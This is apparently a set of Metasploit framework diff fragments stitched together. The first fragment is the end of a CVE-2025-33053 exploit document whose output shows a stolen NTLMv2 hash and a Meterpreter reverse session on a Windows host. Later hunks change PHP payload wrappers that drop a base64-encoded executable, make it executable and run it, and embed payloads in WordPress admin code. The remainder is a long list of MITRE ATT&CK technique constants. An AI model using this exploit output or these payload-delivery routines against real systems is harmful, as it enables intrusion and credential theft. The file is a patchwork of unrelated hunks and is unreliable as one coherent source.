+[SMB] NTLMv2-SSP Hash       : msfuser::WIN10_22H2_7FD2:[HASH]
+
+[*] Sending stage (203846 bytes) to 10.5.132.137
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.137:49740) at 2025-06-24 16:08:56 +0200
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN10_22H2_7FD2\msfuser @ WIN10_22H2_7FD2  192.168.3.7:4444 -> 10.5.132.137:49740 (10.5.132.137)
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10_22H2_7FD2
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
+
+## References
+
+- [GitHub PoC](https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept)
+- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
+- [LOLBAS Project](https://lolbas-project.github.io)
+- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053)
+
@@ -87,8 +87,11 @@ module Metasploit
            # It doesn't appear to be documented anywhere, but Microsoft gives us a bit
            # of extra information in the e-data section
            begin
-              pa_data_entry = krb_err.res.e_data_as_pa_data_entry
-              if pa_data_entry && pa_data_entry.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_PW_SALT
+              pa_data_entry = krb_err.res.e_data_as_pa_data.find do |pa_data|
+                pa_data.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_PW_SALT
+              end
+
+              if pa_data_entry
                pw_salt = pa_data_entry.decoded_value
                if pw_salt.nt_status
                  case pw_salt.nt_status.value
@@ -107,7 +110,7 @@ module Metasploit
                  Metasploit::Model::Login::Status::DISABLED
                end
              else
-                  Metasploit::Model::Login::Status::DISABLED
+                Metasploit::Model::Login::Status::DISABLED
              end
            rescue Rex::Proto::Kerberos::Model::Error::KerberosDecodingError
              # Could be a non-MS implementation?
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.67"
+      VERSION = "6.4.72"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -55,6 +55,8 @@ RankingName         =
 # Stability traits
 #

+# Module stability is unknown - this is a sentinel value, and is not a valid stability enum value
+UNKNOWN_STABILITY      = ['unknown-stability']
 # Module should not crash the service.
 CRASH_SAFE             = 'crash-safe'
 # Module may crash the service, but the service restarts.
@@ -74,6 +76,8 @@ OS_RESOURCE_LOSS       = 'os-resource-loss'
 # Side-effect traits
 #

+# Module side effects is unknown - this is a sentinel value, and is not a valid side effect enum value
+UNKNOWN_SIDE_EFFECTS = ['unknown-side-effects']
 # Modules leaves a payload or a dropper on the target machine.
 ARTIFACTS_ON_DISK = 'artifacts-on-disk'
 # Module modifies some configuration setting on the target machine.
@@ -95,6 +99,8 @@ PHYSICAL_EFFECTS  = 'physical-effects'
 # Reliability
 #

+# Module reliability is unknown - this is a sentinel value, and is not a valid reliability enum value
+UNKNOWN_RELIABILITY = ['unknown-reliability']
 # The module tends to fail to get a session on the first attempt.
 FIRST_ATTEMPT_FAIL = 'first-attempt-fail'
 # The module is expected to get a shell every time it runs.
@@ -49,15 +49,16 @@ module Exploit::PhpEXE
        print_warning("Unable to clean up #{bin_name}, delete it manually")
      end
      p = Rex::Text.encode_base64(generate_payload_exe)
+      vars = Rex::RandomIdentifier::Generator.new(language: :php)
      php = %Q{
-      #{php_preamble}
+      #{php_preamble(vars_generator: vars)}
      $ex = "#{bin_name}";
      $f = fopen($ex, "wb");
      fwrite($f, base64_decode("#{p}"));
      fclose($f);
      chmod($ex, 0777);
      function my_cmd($cmd) {
-      #{php_system_block};
+      #{php_system_block(vars_generator: vars)};
      }
      if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
        my_cmd($ex . "&");
@@ -61,11 +61,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin

    php_code = "<?php #{payload.encoded} ?>"
    if target['Arch'] != ARCH_PHP
-      dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+      vars = Rex::RandomIdentifier::Generator.new(language: :php)
      php_code = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{Rex::Text.encode_base64(payload.encoded)}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+        #{php_preamble(vars_generator: vars)}
+        #{php_system_block(vars_generator: vars, cmd: payload.encoded)}
      END_OF_PHP_CODE
      php_code = php_code + '?>'
    end
@@ -59,8 +59,8 @@ module Msf
        name: DEFER_MODULE_LOADS,
        description: 'When enabled will not eagerly load all modules',
        requires_restart: true,
-        default_value: false,
-        developer_notes: 'Needs a final round of testing. Can be enabled after 6.4.0 is released.'
+        default_value: true,
+        developer_notes: 'Enabled in Metasploit 6.4.x'
      }.freeze,
      {
        name: SMB_SESSION_TYPE,
@@ -0,0 +1,20 @@
+# frozen_string_literal: true
+
+module Msf
+  module Mitre
+    module Attack
+      module Categories
+        PATHS = {
+          'TA' => 'tactics',
+          'DS' => 'datasources',
+          'S' => 'software',
+          'M' => 'mitigations',
+          'A' => 'assets',
+          'G' => 'groups',
+          'C' => 'campaigns',
+          'T' => 'techniques'
+        }.freeze
+      end
+    end
+  end
+end
@@ -0,0 +1,1184 @@
+# frozen_string_literal: true
+
+module Msf
+  module Mitre
+    module Attack
+      # This file was auto-generated by tools/dev/generate_mitre_attack_technique_constants.rb please do not manually edit it
+      module Technique
+        T1001_DATA_OBFUSCATION = 'T1001'
+        T1001_001_JUNK_DATA = 'T1001.001'
+        T1001_002_STEGANOGRAPHY = 'T1001.002'
+        T1001_003_PROTOCOL_OR_SERVICE_IMPERSONATION = 'T1001.003'
+
+        T1002_DATA_COMPRESSED = 'T1002'
+
+        T1003_OS_CREDENTIAL_DUMPING = 'T1003'
+        T1003_001_LSASS_MEMORY = 'T1003.001'
+        T1003_002_SECURITY_ACCOUNT_MANAGER = 'T1003.002'
+        T1003_003_NTDS = 'T1003.003'
+        T1003_004_LSA_SECRETS = 'T1003.004'
+        T1003_005_CACHED_DOMAIN_CREDENTIALS = 'T1003.005'
+        T1003_006_DCSYNC = 'T1003.006'
+        T1003_007_PROC_FILESYSTEM = 'T1003.007'
+        T1003_008_ETC_PASSWD_AND_ETC_SHADOW = 'T1003.008'
+
+        T1004_WINLOGON_HELPER_DLL = 'T1004'
+
+        T1005_DATA_FROM_LOCAL_SYSTEM = 'T1005'
+
+        T1006_DIRECT_VOLUME_ACCESS = 'T1006'
+
+        T1007_SYSTEM_SERVICE_DISCOVERY = 'T1007'
+
+        T1008_FALLBACK_CHANNELS = 'T1008'
+
+        T1009_BINARY_PADDING = 'T1009'
+
+        T1010_APPLICATION_WINDOW_DISCOVERY = 'T1010'
+
+        T1011_EXFILTRATION_OVER_OTHER_NETWORK_MEDIUM = 'T1011'
+        T1011_001_EXFILTRATION_OVER_BLUETOOTH = 'T1011.001'
+
+        T1012_QUERY_REGISTRY = 'T1012'
+
+        T1013_PORT_MONITORS = 'T1013'
+
+        T1014_ROOTKIT = 'T1014'
+
+        T1015_ACCESSIBILITY_FEATURES = 'T1015'
+
+        T1016_SYSTEM_NETWORK_CONFIGURATION_DISCOVERY = 'T1016'
+        T1016_001_INTERNET_CONNECTION_DISCOVERY = 'T1016.001'
+        T1016_002_WI_FI_DISCOVERY = 'T1016.002'
+
+        T1017_APPLICATION_DEPLOYMENT_SOFTWARE = 'T1017'
+
+        T1018_REMOTE_SYSTEM_DISCOVERY = 'T1018'
+
+        T1019_SYSTEM_FIRMWARE = 'T1019'
+
+        T1020_AUTOMATED_EXFILTRATION = 'T1020'
+        T1020_001_TRAFFIC_DUPLICATION = 'T1020.001'
+
+        T1021_REMOTE_SERVICES = 'T1021'
+        T1021_001_REMOTE_DESKTOP_PROTOCOL = 'T1021.001'
+        T1021_002_SMB_WINDOWS_ADMIN_SHARES = 'T1021.002'
+        T1021_003_DISTRIBUTED_COMPONENT_OBJECT_MODEL = 'T1021.003'
+        T1021_004_SSH = 'T1021.004'
+        T1021_005_VNC = 'T1021.005'
+        T1021_006_WINDOWS_REMOTE_MANAGEMENT = 'T1021.006'
+        T1021_007_CLOUD_SERVICES = 'T1021.007'
+        T1021_008_DIRECT_CLOUD_VM_CONNECTIONS = 'T1021.008'
+
+        T1022_DATA_ENCRYPTED = 'T1022'
+
+        T1023_SHORTCUT_MODIFICATION = 'T1023'
+
+        T1024_CUSTOM_CRYPTOGRAPHIC_PROTOCOL = 'T1024'
+
+        T1025_DATA_FROM_REMOVABLE_MEDIA = 'T1025'
+
+        T1026_MULTIBAND_COMMUNICATION = 'T1026'
+
+        T1027_OBFUSCATED_FILES_OR_INFORMATION = 'T1027'
+        T1027_001_BINARY_PADDING = 'T1027.001'
+        T1027_002_SOFTWARE_PACKING = 'T1027.002'
+        T1027_003_STEGANOGRAPHY = 'T1027.003'
+        T1027_004_COMPILE_AFTER_DELIVERY = 'T1027.004'
+        T1027_005_INDICATOR_REMOVAL_FROM_TOOLS = 'T1027.005'
+        T1027_006_HTML_SMUGGLING = 'T1027.006'
+        T1027_007_DYNAMIC_API_RESOLUTION = 'T1027.007'
+        T1027_008_STRIPPED_PAYLOADS = 'T1027.008'
+        T1027_009_EMBEDDED_PAYLOADS = 'T1027.009'
+        T1027_010_COMMAND_OBFUSCATION = 'T1027.010'
+        T1027_011_FILELESS_STORAGE = 'T1027.011'
+        T1027_012_LNK_ICON_SMUGGLING = 'T1027.012'
+        T1027_013_ENCRYPTED_ENCODED_FILE = 'T1027.013'
+        T1027_014_POLYMORPHIC_CODE = 'T1027.014'
+        T1027_015_COMPRESSION = 'T1027.015'
+        T1027_016_JUNK_CODE_INSERTION = 'T1027.016'
+        T1027_017_SVG_SMUGGLING = 'T1027.017'
+
+        T1028_WINDOWS_REMOTE_MANAGEMENT = 'T1028'
+
+        T1029_SCHEDULED_TRANSFER = 'T1029'
+
+        T1030_DATA_TRANSFER_SIZE_LIMITS = 'T1030'
+
+        T1031_MODIFY_EXISTING_SERVICE = 'T1031'
+
+        T1032_STANDARD_CRYPTOGRAPHIC_PROTOCOL = 'T1032'
+
+        T1033_SYSTEM_OWNER_USER_DISCOVERY = 'T1033'
+
+        T1034_PATH_INTERCEPTION = 'T1034'
+
+        T1035_SERVICE_EXECUTION = 'T1035'
+
+        T1036_MASQUERADING = 'T1036'
+        T1036_001_INVALID_CODE_SIGNATURE = 'T1036.001'
+        T1036_002_RIGHT_TO_LEFT_OVERRIDE = 'T1036.002'
+        T1036_003_RENAME_LEGITIMATE_UTILITIES = 'T1036.003'
+        T1036_004_MASQUERADE_TASK_OR_SERVICE = 'T1036.004'
+        T1036_005_MATCH_LEGITIMATE_RESOURCE_NAME_OR_LOCATION = 'T1036.005'
+        T1036_006_SPACE_AFTER_FILENAME = 'T1036.006'
+        T1036_007_DOUBLE_FILE_EXTENSION = 'T1036.007'
+        T1036_008_MASQUERADE_FILE_TYPE = 'T1036.008'
+        T1036_009_BREAK_PROCESS_TREES = 'T1036.009'
+        T1036_010_MASQUERADE_ACCOUNT_NAME = 'T1036.010'
+        T1036_011_OVERWRITE_PROCESS_ARGUMENTS = 'T1036.011'
+
+        T1037_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS = 'T1037'
+        T1037_001_LOGON_SCRIPT_WINDOWS = 'T1037.001'
+        T1037_002_LOGIN_HOOK = 'T1037.002'
+        T1037_003_NETWORK_LOGON_SCRIPT = 'T1037.003'
+        T1037_004_RC_SCRIPTS = 'T1037.004'
+        T1037_005_STARTUP_ITEMS = 'T1037.005'
+
+        T1038_DLL_SEARCH_ORDER_HIJACKING = 'T1038'
+
+        T1039_DATA_FROM_NETWORK_SHARED_DRIVE = 'T1039'
+
+        T1040_NETWORK_SNIFFING = 'T1040'
+
+        T1041_EXFILTRATION_OVER_C2_CHANNEL = 'T1041'
+
+        T1042_CHANGE_DEFAULT_FILE_ASSOCIATION = 'T1042'
+
+        T1043_COMMONLY_USED_PORT = 'T1043'
+
+        T1044_FILE_SYSTEM_PERMISSIONS_WEAKNESS = 'T1044'
+
+        T1045_SOFTWARE_PACKING = 'T1045'
+
+        T1046_NETWORK_SERVICE_DISCOVERY = 'T1046'
+
+        T1047_WINDOWS_MANAGEMENT_INSTRUMENTATION = 'T1047'
+
+        T1048_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL = 'T1048'
+        T1048_001_EXFILTRATION_OVER_SYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL = 'T1048.001'
+        T1048_002_EXFILTRATION_OVER_ASYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL = 'T1048.002'
+        T1048_003_EXFILTRATION_OVER_UNENCRYPTED_NON_C2_PROTOCOL = 'T1048.003'
+
+        T1049_SYSTEM_NETWORK_CONNECTIONS_DISCOVERY = 'T1049'
+
+        T1050_NEW_SERVICE = 'T1050'
+
+        T1051_SHARED_WEBROOT = 'T1051'
+
+        T1052_EXFILTRATION_OVER_PHYSICAL_MEDIUM = 'T1052'
+        T1052_001_EXFILTRATION_OVER_USB = 'T1052.001'
+
+        T1053_SCHEDULED_TASK_JOB = 'T1053'
+        T1053_001_AT_LINUX = 'T1053.001'
+        T1053_002_AT = 'T1053.002'
+        T1053_003_CRON = 'T1053.003'
+        T1053_004_LAUNCHD = 'T1053.004'
+        T1053_005_SCHEDULED_TASK = 'T1053.005'
+        T1053_006_SYSTEMD_TIMERS = 'T1053.006'
+        T1053_007_CONTAINER_ORCHESTRATION_JOB = 'T1053.007'
+
+        T1054_INDICATOR_BLOCKING = 'T1054'
+
+        T1055_PROCESS_INJECTION = 'T1055'
+        T1055_001_DYNAMIC_LINK_LIBRARY_INJECTION = 'T1055.001'
+        T1055_002_PORTABLE_EXECUTABLE_INJECTION = 'T1055.002'
+        T1055_003_THREAD_EXECUTION_HIJACKING = 'T1055.003'
+        T1055_004_ASYNCHRONOUS_PROCEDURE_CALL = 'T1055.004'
+        T1055_005_THREAD_LOCAL_STORAGE = 'T1055.005'
+        T1055_008_PTRACE_SYSTEM_CALLS = 'T1055.008'
+        T1055_009_PROC_MEMORY = 'T1055.009'
+        T1055_011_EXTRA_WINDOW_MEMORY_INJECTION = 'T1055.011'
+        T1055_012_PROCESS_HOLLOWING = 'T1055.012'
+        T1055_013_PROCESS_DOPPELGANGING = 'T1055.013'
+        T1055_014_VDSO_HIJACKING = 'T1055.014'
+        T1055_015_LISTPLANTING = 'T1055.015'
+
+        T1056_INPUT_CAPTURE = 'T1056'
+        T1056_001_KEYLOGGING = 'T1056.001'
+        T1056_002_GUI_INPUT_CAPTURE = 'T1056.002'
+        T1056_003_WEB_PORTAL_CAPTURE = 'T1056.003'
+        T1056_004_CREDENTIAL_API_HOOKING = 'T1056.004'
+
+        T1057_PROCESS_DISCOVERY = 'T1057'
+
+        T1058_SERVICE_REGISTRY_PERMISSIONS_WEAKNESS = 'T1058'
+
+        T1059_COMMAND_AND_SCRIPTING_INTERPRETER = 'T1059'
+        T1059_001_POWERSHELL = 'T1059.001'
+        T1059_002_APPLESCRIPT = 'T1059.002'
+        T1059_003_WINDOWS_COMMAND_SHELL = 'T1059.003'
+        T1059_004_UNIX_SHELL = 'T1059.004'
+        T1059_005_VISUAL_BASIC = 'T1059.005'
+        T1059_006_PYTHON = 'T1059.006'
+        T1059_007_JAVASCRIPT = 'T1059.007'
+        T1059_008_NETWORK_DEVICE_CLI = 'T1059.008'
+        T1059_009_CLOUD_API = 'T1059.009'
+        T1059_010_AUTOHOTKEY_AUTOIT = 'T1059.010'
+        T1059_011_LUA = 'T1059.011'
+        T1059_012_HYPERVISOR_CLI = 'T1059.012'
+
+        T1060_REGISTRY_RUN_KEYS_STARTUP_FOLDER = 'T1060'
+
+        T1061_GRAPHICAL_USER_INTERFACE = 'T1061'
+
+        T1062_HYPERVISOR = 'T1062'
+
+        T1063_SECURITY_SOFTWARE_DISCOVERY = 'T1063'
+
+        T1064_SCRIPTING = 'T1064'
+
+        T1065_UNCOMMONLY_USED_PORT = 'T1065'
+
+        T1066_INDICATOR_REMOVAL_FROM_TOOLS = 'T1066'
+
+        T1067_BOOTKIT = 'T1067'
+
+        T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION = 'T1068'
+
+        T1069_PERMISSION_GROUPS_DISCOVERY = 'T1069'
+        T1069_001_LOCAL_GROUPS = 'T1069.001'
+        T1069_002_DOMAIN_GROUPS = 'T1069.002'
+        T1069_003_CLOUD_GROUPS = 'T1069.003'
+
+        T1070_INDICATOR_REMOVAL = 'T1070'
+        T1070_001_CLEAR_WINDOWS_EVENT_LOGS = 'T1070.001'
+        T1070_002_CLEAR_LINUX_OR_MAC_SYSTEM_LOGS = 'T1070.002'
+        T1070_003_CLEAR_COMMAND_HISTORY = 'T1070.003'
+        T1070_004_FILE_DELETION = 'T1070.004'
+        T1070_005_NETWORK_SHARE_CONNECTION_REMOVAL = 'T1070.005'
+        T1070_006_TIMESTOMP = 'T1070.006'
+        T1070_007_CLEAR_NETWORK_CONNECTION_HISTORY_AND_CONFIGURATIONS = 'T1070.007'
+        T1070_008_CLEAR_MAILBOX_DATA = 'T1070.008'
+        T1070_009_CLEAR_PERSISTENCE = 'T1070.009'
+        T1070_010_RELOCATE_MALWARE = 'T1070.010'
+
+        T1071_APPLICATION_LAYER_PROTOCOL = 'T1071'
+        T1071_001_WEB_PROTOCOLS = 'T1071.001'
+        T1071_002_FILE_TRANSFER_PROTOCOLS = 'T1071.002'
+        T1071_003_MAIL_PROTOCOLS = 'T1071.003'
+        T1071_004_DNS = 'T1071.004'
+        T1071_005_PUBLISH_SUBSCRIBE_PROTOCOLS = 'T1071.005'
+
+        T1072_SOFTWARE_DEPLOYMENT_TOOLS = 'T1072'
+
+        T1073_DLL_SIDE_LOADING = 'T1073'
+
+        T1074_DATA_STAGED = 'T1074'
+        T1074_001_LOCAL_DATA_STAGING = 'T1074.001'
+        T1074_002_REMOTE_DATA_STAGING = 'T1074.002'
+
+        T1075_PASS_THE_HASH = 'T1075'
+
+        T1076_REMOTE_DESKTOP_PROTOCOL = 'T1076'
+
+        T1077_WINDOWS_ADMIN_SHARES = 'T1077'
+
+        T1078_VALID_ACCOUNTS = 'T1078'
+        T1078_001_DEFAULT_ACCOUNTS = 'T1078.001'
+        T1078_002_DOMAIN_ACCOUNTS = 'T1078.002'
+        T1078_003_LOCAL_ACCOUNTS = 'T1078.003'
+        T1078_004_CLOUD_ACCOUNTS = 'T1078.004'
+
+        T1079_MULTILAYER_ENCRYPTION = 'T1079'
+
+        T1080_TAINT_SHARED_CONTENT = 'T1080'
+
+        T1081_CREDENTIALS_IN_FILES = 'T1081'
+
+        T1082_SYSTEM_INFORMATION_DISCOVERY = 'T1082'
+
+        T1083_FILE_AND_DIRECTORY_DISCOVERY = 'T1083'
+
+        T1084_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION = 'T1084'
+
+        T1085_RUNDLL32 = 'T1085'
+
+        T1086_POWERSHELL = 'T1086'
+
+        T1087_ACCOUNT_DISCOVERY = 'T1087'
+        T1087_001_LOCAL_ACCOUNT = 'T1087.001'
+        T1087_002_DOMAIN_ACCOUNT = 'T1087.002'
+        T1087_003_EMAIL_ACCOUNT = 'T1087.003'
+        T1087_004_CLOUD_ACCOUNT = 'T1087.004'
+
+        T1088_BYPASS_USER_ACCOUNT_CONTROL = 'T1088'
+
+        T1089_DISABLING_SECURITY_TOOLS = 'T1089'
+
+        T1090_PROXY = 'T1090'
+        T1090_001_INTERNAL_PROXY = 'T1090.001'
+        T1090_002_EXTERNAL_PROXY = 'T1090.002'
+        T1090_003_MULTI_HOP_PROXY = 'T1090.003'
+        T1090_004_DOMAIN_FRONTING = 'T1090.004'
+
+        T1091_REPLICATION_THROUGH_REMOVABLE_MEDIA = 'T1091'
+
+        T1092_COMMUNICATION_THROUGH_REMOVABLE_MEDIA = 'T1092'
+
+        T1093_PROCESS_HOLLOWING = 'T1093'
+
+        T1094_CUSTOM_COMMAND_AND_CONTROL_PROTOCOL = 'T1094'
+
+        T1095_NON_APPLICATION_LAYER_PROTOCOL = 'T1095'
+
+        T1096_NTFS_FILE_ATTRIBUTES = 'T1096'
+
+        T1097_PASS_THE_TICKET = 'T1097'
+
+        T1098_ACCOUNT_MANIPULATION = 'T1098'
+        T1098_001_ADDITIONAL_CLOUD_CREDENTIALS = 'T1098.001'
+        T1098_002_ADDITIONAL_EMAIL_DELEGATE_PERMISSIONS = 'T1098.002'
+        T1098_003_ADDITIONAL_CLOUD_ROLES = 'T1098.003'
+        T1098_004_SSH_AUTHORIZED_KEYS = 'T1098.004'
+        T1098_005_DEVICE_REGISTRATION = 'T1098.005'
+        T1098_006_ADDITIONAL_CONTAINER_CLUSTER_ROLES = 'T1098.006'
+        T1098_007_ADDITIONAL_LOCAL_OR_DOMAIN_GROUPS = 'T1098.007'
+
+        T1099_TIMESTOMP = 'T1099'
+
+        T1100_WEB_SHELL = 'T1100'
+
+        T1101_SECURITY_SUPPORT_PROVIDER = 'T1101'
+
+        T1102_WEB_SERVICE = 'T1102'
+        T1102_001_DEAD_DROP_RESOLVER = 'T1102.001'
+        T1102_002_BIDIRECTIONAL_COMMUNICATION = 'T1102.002'
+        T1102_003_ONE_WAY_COMMUNICATION = 'T1102.003'
+
+        T1103_APPINIT_DLLS = 'T1103'
+
+        T1104_MULTI_STAGE_CHANNELS = 'T1104'
+
+        T1105_INGRESS_TOOL_TRANSFER = 'T1105'
+
+        T1106_NATIVE_API = 'T1106'
+
+        T1107_FILE_DELETION = 'T1107'
+
+        T1108_REDUNDANT_ACCESS = 'T1108'
+
+        T1109_COMPONENT_FIRMWARE = 'T1109'
+
+        T1110_BRUTE_FORCE = 'T1110'
+        T1110_001_PASSWORD_GUESSING = 'T1110.001'
+        T1110_002_PASSWORD_CRACKING = 'T1110.002'
+        T1110_003_PASSWORD_SPRAYING = 'T1110.003'
+        T1110_004_CREDENTIAL_STUFFING = 'T1110.004'
+
+        T1111_MULTI_FACTOR_AUTHENTICATION_INTERCEPTION = 'T1111'
+
+        T1112_MODIFY_REGISTRY = 'T1112'
+
+        T1113_SCREEN_CAPTURE = 'T1113'
+
+        T1114_EMAIL_COLLECTION = 'T1114'
+        T1114_001_LOCAL_EMAIL_COLLECTION = 'T1114.001'
+        T1114_002_REMOTE_EMAIL_COLLECTION = 'T1114.002'
+        T1114_003_EMAIL_FORWARDING_RULE = 'T1114.003'
+
+        T1115_CLIPBOARD_DATA = 'T1115'
+
+        T1116_CODE_SIGNING = 'T1116'
+
+        T1117_REGSVR32 = 'T1117'
+
+        T1118_INSTALLUTIL = 'T1118'
+
+        T1119_AUTOMATED_COLLECTION = 'T1119'
+
+        T1120_PERIPHERAL_DEVICE_DISCOVERY = 'T1120'
+
+        T1121_REGSVCS_REGASM = 'T1121'
+
+        T1122_COMPONENT_OBJECT_MODEL_HIJACKING = 'T1122'
+
+        T1123_AUDIO_CAPTURE = 'T1123'
+
+        T1124_SYSTEM_TIME_DISCOVERY = 'T1124'
+
+        T1125_VIDEO_CAPTURE = 'T1125'
+
+        T1126_NETWORK_SHARE_CONNECTION_REMOVAL = 'T1126'
+
+        T1127_TRUSTED_DEVELOPER_UTILITIES_PROXY_EXECUTION = 'T1127'
+        T1127_001_MSBUILD = 'T1127.001'
+        T1127_002_CLICKONCE = 'T1127.002'
+        T1127_003_JAMPLUS = 'T1127.003'
+
+        T1128_NETSH_HELPER_DLL = 'T1128'
+
+        T1129_SHARED_MODULES = 'T1129'
+
+        T1130_INSTALL_ROOT_CERTIFICATE = 'T1130'
+
+        T1131_AUTHENTICATION_PACKAGE = 'T1131'
+
+        T1132_DATA_ENCODING = 'T1132'
+        T1132_001_STANDARD_ENCODING = 'T1132.001'
+        T1132_002_NON_STANDARD_ENCODING = 'T1132.002'
+
+        T1133_EXTERNAL_REMOTE_SERVICES = 'T1133'
+
+        T1134_ACCESS_TOKEN_MANIPULATION = 'T1134'
+        T1134_001_TOKEN_IMPERSONATION_THEFT = 'T1134.001'
+        T1134_002_CREATE_PROCESS_WITH_TOKEN = 'T1134.002'
+        T1134_003_MAKE_AND_IMPERSONATE_TOKEN = 'T1134.003'
+        T1134_004_PARENT_PID_SPOOFING = 'T1134.004'
+        T1134_005_SID_HISTORY_INJECTION = 'T1134.005'
+
+        T1135_NETWORK_SHARE_DISCOVERY = 'T1135'
+
+        T1136_CREATE_ACCOUNT = 'T1136'
+        T1136_001_LOCAL_ACCOUNT = 'T1136.001'
+        T1136_002_DOMAIN_ACCOUNT = 'T1136.002'
+        T1136_003_CLOUD_ACCOUNT = 'T1136.003'
+
+        T1137_OFFICE_APPLICATION_STARTUP = 'T1137'
+        T1137_001_OFFICE_TEMPLATE_MACROS = 'T1137.001'
+        T1137_002_OFFICE_TEST = 'T1137.002'
+        T1137_003_OUTLOOK_FORMS = 'T1137.003'
+        T1137_004_OUTLOOK_HOME_PAGE = 'T1137.004'
+        T1137_005_OUTLOOK_RULES = 'T1137.005'
+        T1137_006_ADD_INS = 'T1137.006'
+
+        T1138_APPLICATION_SHIMMING = 'T1138'
+
+        T1139_BASH_HISTORY = 'T1139'
+
+        T1140_DEOBFUSCATE_DECODE_FILES_OR_INFORMATION = 'T1140'
+
+        T1141_INPUT_PROMPT = 'T1141'
+
+        T1142_KEYCHAIN = 'T1142'
+
+        T1143_HIDDEN_WINDOW = 'T1143'
+
+        T1144_GATEKEEPER_BYPASS = 'T1144'
+
+        T1145_PRIVATE_KEYS = 'T1145'
+
+        T1146_CLEAR_COMMAND_HISTORY = 'T1146'
+
+        T1147_HIDDEN_USERS = 'T1147'
+
+        T1148_HISTCONTROL = 'T1148'
+
+        T1149_LC_MAIN_HIJACKING = 'T1149'
+
+        T1150_PLIST_MODIFICATION = 'T1150'
+
+        T1151_SPACE_AFTER_FILENAME = 'T1151'
+
+        T1152_LAUNCHCTL = 'T1152'
+
+        T1153_SOURCE = 'T1153'
+
+        T1154_TRAP = 'T1154'
+
+        T1155_APPLESCRIPT = 'T1155'
+
+        T1156_MALICIOUS_SHELL_MODIFICATION = 'T1156'
+
+        T1157_DYLIB_HIJACKING = 'T1157'
+
+        T1158_HIDDEN_FILES_AND_DIRECTORIES = 'T1158'
+
+        T1159_LAUNCH_AGENT = 'T1159'
+
+        T1160_LAUNCH_DAEMON = 'T1160'
+
+        T1161_LC_LOAD_DYLIB_ADDITION = 'T1161'
+
+        T1162_LOGIN_ITEM = 'T1162'
+
+        T1163_RC_COMMON = 'T1163'
+
+        T1164_RE_OPENED_APPLICATIONS = 'T1164'
+
+        T1165_STARTUP_ITEMS = 'T1165'
+
+        T1166_SETUID_AND_SETGID = 'T1166'
+
+        T1167_SECURITYD_MEMORY = 'T1167'
+
+        T1168_LOCAL_JOB_SCHEDULING = 'T1168'
+
+        T1169_SUDO = 'T1169'
+
+        T1170_MSHTA = 'T1170'
+
+        T1171_LLMNR_NBT_NS_POISONING_AND_RELAY = 'T1171'
+
+        T1172_DOMAIN_FRONTING = 'T1172'
+
+        T1173_DYNAMIC_DATA_EXCHANGE = 'T1173'
+
+        T1174_PASSWORD_FILTER_DLL = 'T1174'
+
+        T1175_COMPONENT_OBJECT_MODEL_AND_DISTRIBUTED_COM = 'T1175'
+
+        T1176_SOFTWARE_EXTENSIONS = 'T1176'
+        T1176_001_BROWSER_EXTENSIONS = 'T1176.001'
+        T1176_002_IDE_EXTENSIONS = 'T1176.002'
+
+        T1177_LSASS_DRIVER = 'T1177'
+
+        T1178_SID_HISTORY_INJECTION = 'T1178'
+
+        T1179_HOOKING = 'T1179'
+
+        T1180_SCREENSAVER = 'T1180'
+
+        T1181_EXTRA_WINDOW_MEMORY_INJECTION = 'T1181'
+
+        T1182_APPCERT_DLLS = 'T1182'
+
+        T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION = 'T1183'
+
+        T1184_SSH_HIJACKING = 'T1184'
+
+        T1185_BROWSER_SESSION_HIJACKING = 'T1185'
+
+        T1186_PROCESS_DOPPELGANGING = 'T1186'
+
+        T1187_FORCED_AUTHENTICATION = 'T1187'
+
+        T1188_MULTI_HOP_PROXY = 'T1188'
+
+        T1189_DRIVE_BY_COMPROMISE = 'T1189'
+
+        T1190_EXPLOIT_PUBLIC_FACING_APPLICATION = 'T1190'
+
+        T1191_CMSTP = 'T1191'
+
+        T1192_SPEARPHISHING_LINK = 'T1192'
+
+        T1193_SPEARPHISHING_ATTACHMENT = 'T1193'
+
+        T1194_SPEARPHISHING_VIA_SERVICE = 'T1194'
+
+        T1195_SUPPLY_CHAIN_COMPROMISE = 'T1195'
+        T1195_001_COMPROMISE_SOFTWARE_DEPENDENCIES_AND_DEVELOPMENT_TOOLS = 'T1195.001'
+        T1195_002_COMPROMISE_SOFTWARE_SUPPLY_CHAIN = 'T1195.002'
+        T1195_003_COMPROMISE_HARDWARE_SUPPLY_CHAIN = 'T1195.003'
+
+        T1196_CONTROL_PANEL_ITEMS = 'T1196'
+
+        T1197_BITS_JOBS = 'T1197'
+
+        T1198_SIP_AND_TRUST_PROVIDER_HIJACKING = 'T1198'
+
+        T1199_TRUSTED_RELATIONSHIP = 'T1199'
+
+        T1200_HARDWARE_ADDITIONS = 'T1200'
+
+        T1201_PASSWORD_POLICY_DISCOVERY = 'T1201'
+
+        T1202_INDIRECT_COMMAND_EXECUTION = 'T1202'
+
